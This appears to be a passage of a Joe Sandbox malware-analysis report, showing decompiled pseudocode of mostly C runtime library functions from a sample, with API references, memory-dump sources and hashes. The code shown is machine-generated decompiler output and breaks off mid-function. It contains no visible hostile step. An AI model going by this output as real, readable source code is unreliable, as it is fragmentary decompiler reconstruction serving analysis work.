				if( *((intOrPtr*)(_t36 + 0xc)) != 0) {
					E00422BFA(_t21);
					_t39 = _t39 + 4;
				}
				 *((intOrPtr*)(_t36 + 0xc)) = 0;
				_t22 =  *((intOrPtr*)(_t36 + 4));
				if( *((intOrPtr*)(_t36 + 4)) != 0) {
					E00422BFA(_t22);
					_t39 = _t39 + 4;
				}
				 *((intOrPtr*)(_t36 + 4)) = 0;
				_v4 = 0xffffffff;
				_t23 = E0040D978(_t36);
				 *[fs:0x0] = _v12;
				return _t23;
			}

0x004029a0
0x004029a2
0x004029ad
0x004029ae
0x004029b1
0x004029b8
0x004029bd
0x004029c3
0x004029c5
0x004029ca
0x004029d2
0x004029d7
0x004029dc
0x004029e1
0x004029e4
0x004029e9
0x004029e9
0x004029ec
0x004029ef
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x004029ff
0x00402a02
0x00402a07
0x00402a0a
0x00402a0f
0x00402a0f
0x00402a12
0x00402a15
0x00402a1a
0x00402a1d
0x00402a22
0x00402a22
0x00402a27
0x00402a2a
0x00402a32
0x00402a3b
0x00402a48

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004029D2

Part of subcall function 0040DAF9: _setlocale.LIBCMT ref: 0040DB0B

_free.LIBCMT ref: 004029E4

Part of subcall function 00422BFA: HeapFree.KERNEL32(00000000,00000000,?,00427FDB,00000000,?,?,00427FF2,?,00423103,004027E5,B51EC2B3), ref: 00422C10
Part of subcall function 00422BFA: GetLastError.KERNEL32(00000000,?,00427FDB,00000000,?,?,00427FF2,?,00423103,004027E5,B51EC2B3), ref: 00422C22

_free.LIBCMT ref: 004029F7
_free.LIBCMT ref: 00402A0A
_free.LIBCMT ref: 00402A1D

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 33340f1ee96207c4da1ba4d0389562b9e8fd3eac0047ec43e057231f95b33254
Instruction ID: ec3fa261bd442b58c2eeb889aec428b16d513badf553bcbdfbcdd3de5a73bc28
Opcode Fuzzy Hash: 33340f1ee96207c4da1ba4d0389562b9e8fd3eac0047ec43e057231f95b33254
Instruction Fuzzy Hash: F311B2F1A047409BC624DF1A9945A0BF7E9AB80710F548E2FF056D3790E6B8E8048A56

Uniqueness

Uniqueness Score: -1.00%

Function 00428762 Relevance: 7.5, APIs: 5, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00428762(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x45bf68);
				E0042A1F0(__ebx, __edi, __esi);
				_t28 = E00427FEA(__edx, __edi, _t31);
				_t12 =  *0x460dd0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E0042BD94(0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00428715(_t29,  *0x461018);
					 *(_t30 - 4) = 0xfffffffe;
					E004287CF();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00427FEA(__edx, _t26, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					E0042A1CE(_t20, _t25, _t26, _t29, _t34, 0x20);
				}
				return E0042A235(_t29);
			}

0x00428762
0x00428762
0x00428762
0x00428762
0x00428762
0x00428764
0x00428769
0x00428773
0x00428775
0x0042877d
0x004287a1
0x004287a3
0x004287a9
0x004287b3
0x004287be
0x004287c1
0x004287c8
0x0042877f
0x0042877f
0x00428783
0x00000000
0x00428785
0x0042878a
0x0042878a
0x00428783
0x0042878d
0x0042878f
0x00428793
0x00428798
0x004287a0

APIs

__getptd.LIBCMT ref: 0042876E

Part of subcall function 00427FEA: __getptd_noexit.LIBCMT ref: 00427FED
Part of subcall function 00427FEA: __amsg_exit.LIBCMT ref: 00427FFA

__getptd.LIBCMT ref: 00428785
__amsg_exit.LIBCMT ref: 00428793
__lock.LIBCMT ref: 004287A3
__updatetlocinfoEx_nolock.LIBCMT ref: 004287B7

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 7a600221a31fcbc02516c33d19b1ef1b8fd964e56125687aea8c6197c07d0265
Instruction ID: 4a61fe3259aa2675f2bf00ea7379388387b9c75e71806cfb9c7a1e3f98e2578b
Opcode Fuzzy Hash: 7a600221a31fcbc02516c33d19b1ef1b8fd964e56125687aea8c6197c07d0265
Instruction Fuzzy Hash: D0F04F32B057209BD6206B657C02B5D26A0AF40728FA5414FF404A72D2DF6C5951DA9E

Uniqueness

Uniqueness Score: -1.00%

Function 0043D2A8 Relevance: 7.5, APIs: 5, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E0043D2A8(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t14;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t30;
				void* _t31;

				_t26 = __edx;
				_push(8);
				E004256E3(E0044F715, __ebx, __edi, __esi);
				_t30 = __ecx;
				 *((intOrPtr*)(_t31 - 0x14)) = __ecx;
				_t14 = E0040D8E0();
				_t28 = __ecx + 0x14;
				 *_t28 = _t14;
				 *((intOrPtr*)(_t28 + 4)) = _t26;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(_t31 - 4)) = 0;
				 *((intOrPtr*)(_t30 + 8)) = E0043B971(0, E0043C8D6( *((intOrPtr*)(_t31 + 8)), _t26), 0, _t28);
				 *((intOrPtr*)(_t30 + 0xc)) = E0043B971(0, E0043C908( *((intOrPtr*)(_t31 + 8)), _t26), 0, _t28);
				 *((intOrPtr*)(_t30 + 0x10)) = E0044C0A2( *((intOrPtr*)(_t31 + 8)), 0);
				return E0042574F(_t19);
			}

0x0043d2a8
0x0043d2a8
0x0043d2af
0x0043d2b4
0x0043d2b6
0x0043d2b9
0x0043d2c1
0x0043d2c8
0x0043d2ca
0x0043d2cd
0x0043d2d0
0x0043d2d3
0x0043d2e9
0x0043d2fa
0x0043d302
0x0043d30a

APIs

__EH_prolog3_catch.LIBCMT ref: 0043D2AF

Part of subcall function 0040D8E0: ____lc_handle_func.LIBCMT ref: 0040D8E3
Part of subcall function 0040D8E0: ____lc_codepage_func.LIBCMT ref: 0040D8EB

std::_Locinfo::_Getdays.LIBCPMT ref: 0043D2D6

Part of subcall function 0043C8D6: _Yarn.LIBCPMT ref: 0043C8EB
Part of subcall function 0043C8D6: _free.LIBCMT ref: 0043C8F1

_Maklocstr.LIBCPMT ref: 0043D2DC

Part of subcall function 0043B971: _strlen.LIBCMT ref: 0043B984

std::_Locinfo::_Getmonths.LIBCPMT ref: 0043D2EC

Part of subcall function 0043C908: _Yarn.LIBCPMT ref: 0043C91D
Part of subcall function 0043C908: _free.LIBCMT ref: 0043C923

_Maklocstr.LIBCPMT ref: 0043D2F2

Part of subcall function 0044C0A2: ____lc_handle_func.LIBCMT ref: 0044C0BC
Part of subcall function 0044C0A2: GetLocaleInfoW.KERNEL32(?,00000022,00448ED9,00000002,?,?,?,00448ED9), ref: 0044C0C4

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Locinfo::_MaklocstrYarn____lc_handle_func_freestd::_$GetdaysGetmonthsH_prolog3_catchInfoLocale____lc_codepage_func_strlen
String ID:
API String ID: 4141945314-0
Opcode ID: ffd2a315ec184f44d44656afcd394e4b88c7fc7aac8145446e5eea29db076438
Instruction ID: 2907511e48e31b030693fafcb9858a13fd0410cda0f89e3b2ba82c8160fc1276
Opcode Fuzzy Hash: ffd2a315ec184f44d44656afcd394e4b88c7fc7aac8145446e5eea29db076438
Instruction Fuzzy Hash: 6AF0FFB0D007159BC710BF779586A0ABBF4FF58308B40C83EA559A7601D778A514CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406A30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 181
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00406A30(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				signed int _t58;
				signed char _t61;
				short* _t62;
				char _t70;
				intOrPtr _t71;
				signed int _t73;
				char _t75;
				signed int _t81;
				signed int _t82;
				void* _t87;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				intOrPtr _t93;
				intOrPtr _t95;
				signed int _t97;
				signed long long* _t98;
				signed int _t100;
				signed int _t104;
				signed int _t111;
				signed int _t115;
				signed long long _t123;

				_t55 =  *0x4608e0; // 0xb51ec2b3
				 *(_t97 + 0x84) = _t55 ^ _t97;
				_t95 =  *((intOrPtr*)(_t97 + 0xa0));
				 *((intOrPtr*)(_t97 + 0x10)) =  *((intOrPtr*)(_t97 + 0x8c));
				_t58 =  *(_t95 + 0x1c);
				_t90 =  *((intOrPtr*)(_t95 + 0x18));
				 *((intOrPtr*)(_t97 + 0x1c)) = __ecx;
				_t100 = _t58;
				if(_t100 <= 0 && (_t100 < 0 || _t90 == 0) && ( *(_t95 + 0x14) & 0x00002000) == 0) {
					_t90 = 6;
					_t58 = 0;
				}
				_t73 = _t58;
				_t104 = _t73;
				if(_t104 < 0 || _t104 <= 0 && _t90 <= 0x24) {
					 *((intOrPtr*)(_t97 + 0x14)) = _t90;
				} else {
					 *((intOrPtr*)(_t97 + 0x14)) = 0x24;
				}
				_t123 =  *(_t97 + 0xb0);
				asm("cdq");
				_t91 = _t90 -  *((intOrPtr*)(_t97 + 0x14));
				asm("sbb ecx, edx");
				_t81 =  *(_t95 + 0x14);
				_t61 = _t81 & 0x00003000;
				_t70 = 0;
				_t87 = 0;
				if(_t61 != 0x2000) {
					L35:
					 *((char*)(_t97 + 0x20)) = 0x25;
					_t62 = _t97 + 0x21;
					if((_t81 & 0x00000020) != 0) {
						 *((char*)(_t97 + 0x21)) = 0x2b;
						_t62 = _t97 + 0x22;
					}
					if((_t81 & 0x00000010) != 0) {
						 *_t62 = 0x23;
						_t62 = _t62 + 1;
					}
					_t82 = _t81 & 0x00003000;
					 *_t62 = 0x2a2e;
					_t121 = _t82 - 0x2000;
					if(_t82 != 0x2000) {
						__eflags = _t82 - 0x3000;
						if(__eflags != 0) {
							__eflags = _t82 - 0x1000;
							_t40 = _t82 != 0x1000;
							__eflags = _t40;
							_t75 = (_t73 & 0xffffff00 | _t40) + (_t73 & 0xffffff00 | _t40) + 0x65;
						} else {
							_t75 = 0x61;
						}
					} else {
						_t75 = 0x66;
					}
					_t98 = _t97 - 8;
					 *((char*)(_t62 + 2)) = _t75;
					 *_t98 = _t123;
					 *((char*)(_t62 + 3)) = 0;
					_push(swprintf( &(_t98[7]), 0x6c,  &(_t98[5]), _t98[3]));
					_push(_t91);
					_push(_t87);
					_push(_t70);
					_push( &(_t98[0xa]));
					_push(_t98[0x18]);
					_push(_t95);
					_push(_t98[0x18]);
					_push(_t98[0x19]);
					_push(_t98[7]);
					_push(_t98[9]);
					E00404E50(_t121);
					_pop(_t88);
					_pop(_t93);
					_pop(_t71);
					return E004230EF(_t98[7], _t71, _t98[0x1b] ^  &(_t98[8]), _t98[9], _t88, _t93);
				} else {
					_t123 = st1;
					asm("fucompp");
					asm("fnstsw ax");
					if((_t61 & 0x00000044) != 0) {
						goto L35;
					}
					asm("fldz");
					asm("fcom st0, st1");
					asm("fnstsw ax");
					if((_t61 & 0x00000041) != 0) {
						 *((char*)(_t97 + 0x13)) = 0;
						asm("fxch st0, st1");
					} else {
						asm("fxch st0, st1");
						 *((char*)(_t97 + 0x13)) = 1;
						asm("fchs");
					}
					asm("fcom st0, st1");
					asm("fnstsw ax");
					_t123 =  *0x451728;
					if((_t61 & 0x00000041) != 0) {
						while(1) {
							__eflags = _t70 - 0x1388;
							if(__eflags >= 0) {
								goto L16;
							}
							_t123 = _t123 / st0;
							_t70 = _t70 + 0xa;
							asm("fxch st0, st1");
							asm("fcom st0, st2");
							asm("fnstsw ax");
							__eflags = _t61 & 0x00000041;
							if(__eflags != 0) {
								asm("fxch st0, st1");
								continue;
							}
							st0 = _t123;
							goto L21;
						}
						goto L16;
					} else {
						L16:
						st1 = _t123;
						L21:
						asm("fxch st0, st2");
						asm("fcomp st0, st1");
						asm("fnstsw ax");
						if((_t61 & 0x00000005) != 0) {
							L33:
							st1 = _t123;
							if( *((char*)(_t97 + 0x13)) != 0) {
								asm("fchs");
							}
							goto L35;
						}
						_t111 = _t73;
						if(_t111 >= 0 && (_t111 > 0 || _t91 >= 0xa)) {
							_t123 =  *0x451720;
							while(1) {
								asm("fcom st0, st1");
								asm("fnstsw ax");
								if((_t61 & 0x00000001) != 0 || _t87 >= 0x1388) {
									break;
								}
								_t91 = _t91 + 0xfffffff6;
								asm("fxch st0, st1");
								asm("adc ecx, 0xffffffff");
								_t123 = _t123 * st2;
								_t87 = _t87 + 0xa;
								_t115 = _t73;
								if(_t115 > 0 || _t115 >= 0 && _t91 >= 0xa) {
									asm("fxch st0, st1");
									continue;
								} else {
									st1 = _t123;
									goto L33;
								}
							}
							st0 = _t123;
						}
						goto L33;
					}
				}
			}

0x00406a36
0x00406a3d
0x00406a4d
0x00406a54
0x00406a58
0x00406a5c
0x00406a60
0x00406a64
0x00406a66
0x00406a77
0x00406a7c
0x00406a7c
0x00406a7e
0x00406a80
0x00406a82
0x00406a95
0x00406a8b
0x00406a8b
0x00406a8b
0x00406a9d
0x00406aa4
0x00406aa5
0x00406aa7
0x00406aa9
0x00406aae
0x00406ab3
0x00406ab5
0x00406abc
0x00406b80
0x00406b80
0x00406b85
0x00406b8c
0x00406b8e
0x00406b93
0x00406b93
0x00406b9a
0x00406b9c
0x00406b9f
0x00406b9f
0x00406ba0
0x00406ba6
0x00406bab
0x00406bb1
0x00406bbb
0x00406bc1
0x00406bc7
0x00406bcd
0x00406bcd
0x00406bd0
0x00406bc3
0x00406bc3
0x00406bc3
0x00406bb3
0x00406bb3
0x00406bb3
0x00406bd4
0x00406bd7
0x00406bda
0x00406be7
0x00406bfe
0x00406c06
0x00406c0b
0x00406c0c
0x00406c11
0x00406c19
0x00406c1e
0x00406c1f
0x00406c20
0x00406c21
0x00406c22
0x00406c23
0x00406c32
0x00406c35
0x00406c37
0x00406c45
0x00406ac2
0x00406aca
0x00406acc
0x00406ace
0x00406ad3
0x00000000
0x00000000
0x00406ad9
0x00406adb
0x00406add
0x00406ae2
0x00406aef
0x00406af3
0x00406ae4
0x00406ae4
0x00406ae6
0x00406aeb
0x00406aeb
0x00406afb
0x00406afd
0x00406aff
0x00406b08
0x00406b10
0x00406b10
0x00406b16
0x00000000
0x00000000
0x00406b18
0x00406b1a
0x00406b1d
0x00406b1f
0x00406b21
0x00406b23
0x00406b26
0x00406b0e
0x00000000
0x00406b0e
0x00406b28
0x00000000
0x00406b28
0x00000000
0x00406b0a
0x00406b0a
0x00406b0a
0x00406b2a
0x00406b2a
0x00406b2c
0x00406b2e
0x00406b33
0x00406b75
0x00406b7a
0x00406b7c
0x00406b7e
0x00406b7e
0x00000000
0x00406b7c
0x00406b35
0x00406b37
0x00406b40
0x00406b4a
0x00406b4a
0x00406b4c
0x00406b51
0x00000000
0x00000000
0x00406b5b
0x00406b5e
0x00406b60
0x00406b63
0x00406b65
0x00406b68
0x00406b6a
0x00406b48
0x00000000
0x00406b73
0x00406b73
0x00000000
0x00406b73
0x00406b6a
0x00406bb7
0x00406bb7
0x00000000
0x00406b37
0x00406b08

APIs

swprintf.LIBCMT ref: 00406BF2

Strings

+, xrefs: 00406B8E
%, xrefs: 00406B80
$, xrefs: 00406A8B

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: 224ed8c2317500165236c4489da3bada32c6a3399195f057370e7b2992291bc4
Instruction ID: 0b505845c028c5a882434afd41e6109286ae6cc2de016aed0217a9ed1a49602c
Opcode Fuzzy Hash: 224ed8c2317500165236c4489da3bada32c6a3399195f057370e7b2992291bc4
Instruction Fuzzy Hash: 125172B2A043115AD711AE48C844BDB77F4E745740F12897EE486F33D1E63C9D158BDA

Uniqueness

Uniqueness Score: -1.00%

Function 00406C50 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00406C50(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				signed int _t58;
				signed char _t61;
				short* _t62;
				char _t70;
				intOrPtr _t71;
				signed int _t73;
				char _t75;
				signed int _t81;
				signed int _t82;
				void* _t87;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				intOrPtr _t93;
				intOrPtr _t95;
				signed int _t97;
				signed long long* _t98;
				signed int _t100;
				signed int _t104;
				signed int _t110;
				signed int _t114;
				signed long long _t122;

				_t55 =  *0x4608e0; // 0xb51ec2b3
				 *(_t97 + 0x84) = _t55 ^ _t97;
				_t95 =  *((intOrPtr*)(_t97 + 0xa0));
				 *((intOrPtr*)(_t97 + 0x10)) =  *((intOrPtr*)(_t97 + 0x8c));
				_t58 =  *(_t95 + 0x1c);
				_t90 =  *((intOrPtr*)(_t95 + 0x18));
				 *((intOrPtr*)(_t97 + 0x1c)) = __ecx;
				_t100 = _t58;
				if(_t100 <= 0 && (_t100 < 0 || _t90 == 0) && ( *(_t95 + 0x14) & 0x00002000) == 0) {
					_t90 = 6;
					_t58 = 0;
				}
				_t73 = _t58;
				_t104 = _t73;
				if(_t104 < 0 || _t104 <= 0 && _t90 <= 0x24) {
					 *((intOrPtr*)(_t97 + 0x14)) = _t90;
				} else {
					 *((intOrPtr*)(_t97 + 0x14)) = 0x24;
				}
				asm("cdq");
				_t91 = _t90 -  *((intOrPtr*)(_t97 + 0x14));
				asm("sbb ecx, edx");
				_t81 =  *(_t95 + 0x14);
				_t61 = _t81 & 0x00003000;
				_t70 = 0;
				_t87 = 0;
				if(_t61 != 0x2000) {
					_t122 =  *(_t97 + 0xb0);
					goto L36;
				} else {
					asm("fldz");
					asm("fcom st0, st1");
					asm("fnstsw ax");
					if((_t61 & 0x00000005) != 0) {
						 *((char*)(_t97 + 0x13)) = 0;
					} else {
						 *((char*)(_t97 + 0x13)) = 1;
						asm("fchs");
					}
					asm("fcom st0, st1");
					asm("fnstsw ax");
					_t122 =  *0x451728;
					if((_t61 & 0x00000041) != 0) {
						while(1) {
							__eflags = _t70 - 0x1388;
							if(__eflags >= 0) {
								goto L14;
							}
							_t122 = _t122 / st0;
							_t70 = _t70 + 0xa;
							asm("fxch st0, st1");
							asm("fcom st0, st2");
							asm("fnstsw ax");
							__eflags = _t61 & 0x00000041;
							if(__eflags != 0) {
								asm("fxch st0, st1");
								continue;
							}
							st0 = _t122;
							goto L20;
						}
						goto L14;
					} else {
						L14:
						st1 = _t122;
						L20:
						asm("fxch st0, st2");
						asm("fcomp st0, st1");
						asm("fnstsw ax");
						if((_t61 & 0x00000005) != 0) {
							L32:
							st1 = _t122;
							if( *((char*)(_t97 + 0x13)) != 0) {
								asm("fchs");
							}
							L36:
							 *((char*)(_t97 + 0x20)) = 0x25;
							_t62 = _t97 + 0x21;
							if((_t81 & 0x00000020) != 0) {
								 *((char*)(_t97 + 0x21)) = 0x2b;
								_t62 = _t97 + 0x22;
							}
							if((_t81 & 0x00000010) != 0) {
								 *_t62 = 0x23;
								_t62 = _t62 + 1;
							}
							_t82 = _t81 & 0x00003000;
							 *_t62 = 0x2a2e;
							 *((char*)(_t62 + 2)) = 0x4c;
							_t120 = _t82 - 0x2000;
							if(_t82 != 0x2000) {
								__eflags = _t82 - 0x3000;
								if(__eflags != 0) {
									__eflags = _t82 - 0x1000;
									_t40 = _t82 != 0x1000;
									__eflags = _t40;
									_t75 = (_t73 & 0xffffff00 | _t40) + (_t73 & 0xffffff00 | _t40) + 0x65;
								} else {
									_t75 = 0x61;
								}
							} else {
								_t75 = 0x66;
							}
							_t98 = _t97 - 8;
							 *((char*)(_t62 + 3)) = _t75;
							 *_t98 = _t122;
							 *((char*)(_t62 + 4)) = 0;
							_push(swprintf( &(_t98[7]), 0x6c,  &(_t98[5]), _t98[3]));
							_push(_t91);
							_push(_t87);
							_push(_t70);
							_push( &(_t98[0xa]));
							_push(_t98[0x18]);
							_push(_t95);
							_push(_t98[0x18]);
							_push(_t98[0x19]);
							_push(_t98[7]);
							_push(_t98[9]);
							E00404E50(_t120);
							_pop(_t88);
							_pop(_t93);
							_pop(_t71);
							return E004230EF(_t98[7], _t71, _t98[0x1b] ^  &(_t98[8]), _t98[9], _t88, _t93);
						}
						_t110 = _t73;
						if(_t110 >= 0 && (_t110 > 0 || _t91 >= 0xa)) {
							_t122 =  *0x451720;
							while(1) {
								asm("fcom st0, st1");
								asm("fnstsw ax");
								if((_t61 & 0x00000001) != 0 || _t87 >= 0x1388) {
									break;
								}
								_t91 = _t91 + 0xfffffff6;
								asm("fxch st0, st1");
								asm("adc ecx, 0xffffffff");
								_t122 = _t122 * st2;
								_t87 = _t87 + 0xa;
								_t114 = _t73;
								if(_t114 > 0 || _t114 >= 0 && _t91 >= 0xa) {
									asm("fxch st0, st1");
									continue;
								} else {
									st1 = _t122;
									goto L32;
								}
							}
							st0 = _t122;
						}
						goto L32;
					}
				}
			}

0x00406c56
0x00406c5d
0x00406c6d
0x00406c74
0x00406c78
0x00406c7c
0x00406c80
0x00406c84
0x00406c86
0x00406c97
0x00406c9c
0x00406c9c
0x00406c9e
0x00406ca0
0x00406ca2
0x00406cb5
0x00406cab
0x00406cab
0x00406cab
0x00406cbd
0x00406cbe
0x00406cc0
0x00406cc2
0x00406cc7
0x00406ccc
0x00406cce
0x00406cd5
0x00406d8b
0x00000000
0x00406cdb
0x00406cdb
0x00406ce4
0x00406ce6
0x00406ceb
0x00406d0d
0x00406ced
0x00406ced
0x00406cf2
0x00406cf2
0x00406cfa
0x00406cfc
0x00406cfe
0x00406d07
0x00406d15
0x00406d15
0x00406d1b
0x00000000
0x00000000
0x00406d1d
0x00406d1f
0x00406d22
0x00406d24
0x00406d26
0x00406d28
0x00406d2b
0x00406d13
0x00000000
0x00406d13
0x00406d2d
0x00000000
0x00406d2d
0x00000000
0x00406d09
0x00406d09
0x00406d09
0x00406d2f
0x00406d2f
0x00406d31
0x00406d33
0x00406d38
0x00406d7a
0x00406d7f
0x00406d81
0x00406d83
0x00406d83
0x00406d92
0x00406d92
0x00406d97
0x00406d9e
0x00406da0
0x00406da5
0x00406da5
0x00406dac
0x00406dae
0x00406db1
0x00406db1
0x00406db2
0x00406db8
0x00406dbd
0x00406dc1
0x00406dc7
0x00406dcd
0x00406dd3
0x00406dd9
0x00406ddf
0x00406ddf
0x00406de2
0x00406dd5
0x00406dd5
0x00406dd5
0x00406dc9
0x00406dc9
0x00406dc9
0x00406de6
0x00406de9
0x00406dec
0x00406df9
0x00406e10
0x00406e18
0x00406e1d
0x00406e1e
0x00406e23
0x00406e2b
0x00406e30
0x00406e31
0x00406e32
0x00406e33
0x00406e34
0x00406e35
0x00406e44
0x00406e47
0x00406e49
0x00406e57
0x00406e57
0x00406d3a
0x00406d3c
0x00406d45
0x00406d4f
0x00406d4f
0x00406d51
0x00406d56
0x00000000
0x00000000
0x00406d60
0x00406d63
0x00406d65
0x00406d68
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d4d
0x00000000
0x00406d78
0x00406d78
0x00000000
0x00406d78
0x00406d6f
0x00406d87
0x00406d87
0x00000000
0x00406d3c
0x00406d07

APIs

swprintf.LIBCMT ref: 00406E04

Strings

+, xrefs: 00406DA0
%, xrefs: 00406D92
$, xrefs: 00406CAB

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: 9e5f662322ded6872eed7ca0aa2ac45d61933ab525777b5e6248aadb25cb15da
Instruction ID: 2376f4d7cb4eca082b9d2c067ba2def371902be7a99089228236967acbae3f5b
Opcode Fuzzy Hash: 9e5f662322ded6872eed7ca0aa2ac45d61933ab525777b5e6248aadb25cb15da
Instruction Fuzzy Hash: 94514E72B083409AD725DE08D844B9B7BE4EF85340F12496EE8C6B32D1D63C8915479B

Uniqueness

Uniqueness Score: -1.00%

Function 004162AF Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004162AF(void* __edi, intOrPtr __esi) {
				void* _t198;
				intOrPtr* _t205;
				intOrPtr _t214;
				intOrPtr* _t222;
				signed int _t224;
				void* _t226;
				intOrPtr _t239;
				intOrPtr* _t240;
				intOrPtr* _t243;
				intOrPtr* _t257;
				signed int _t263;
				signed int _t275;
				intOrPtr _t276;
				intOrPtr _t321;
				intOrPtr _t323;
				signed int _t327;
				intOrPtr _t334;
				signed int _t358;
				signed int _t360;
				void* _t368;
				intOrPtr _t372;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t378;
				void* _t380;
				void* _t382;
				void* _t386;
				void* _t393;
				void* _t396;
				void* _t398;

				_t372 = __esi;
				_t368 = __edi;
				while(1) {
					 *(_t378 - 0x20) =  *(_t378 - 0x20) + 1;
					if( *(_t378 - 0x20) < 0x6d) {
						 *(_t378 - 0x6c) =  *(_t378 - 0x20);
						 *((intOrPtr*)(_t378 - 0x68)) = 0;
						 *((intOrPtr*)(_t378 - 0x70)) =  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xf4));
						_t386 =  *((intOrPtr*)(_t378 - 0x68)) -  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x70)) + 0x1c));
						if(_t386 < 0 || _t386 <= 0 &&  *(_t378 - 0x6c) <  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x70)) + 0x18))) {
							_t372 =  *((intOrPtr*)( *((intOrPtr*)(_t378 - 0x64)) + 0xf4));
							_t257 = E00417E40(_t378 - 0x1c,  *(_t378 - 0x20));
							_t327 =  *(_t378 - 0x20);
							 *_t257 =  *((intOrPtr*)(_t372 + 0x50 + _t327 * 8));
							 *((intOrPtr*)(_t257 + 4)) =  *((intOrPtr*)(_t372 + 0x54 + _t327 * 8));
							continue;
						} else {
						}
					}
					_t28 = _t378 + 0xc; // 0x414fe3
					_t388 =  *_t28 & 0x000000ff;
					if(( *_t28 & 0x000000ff) == 0) {
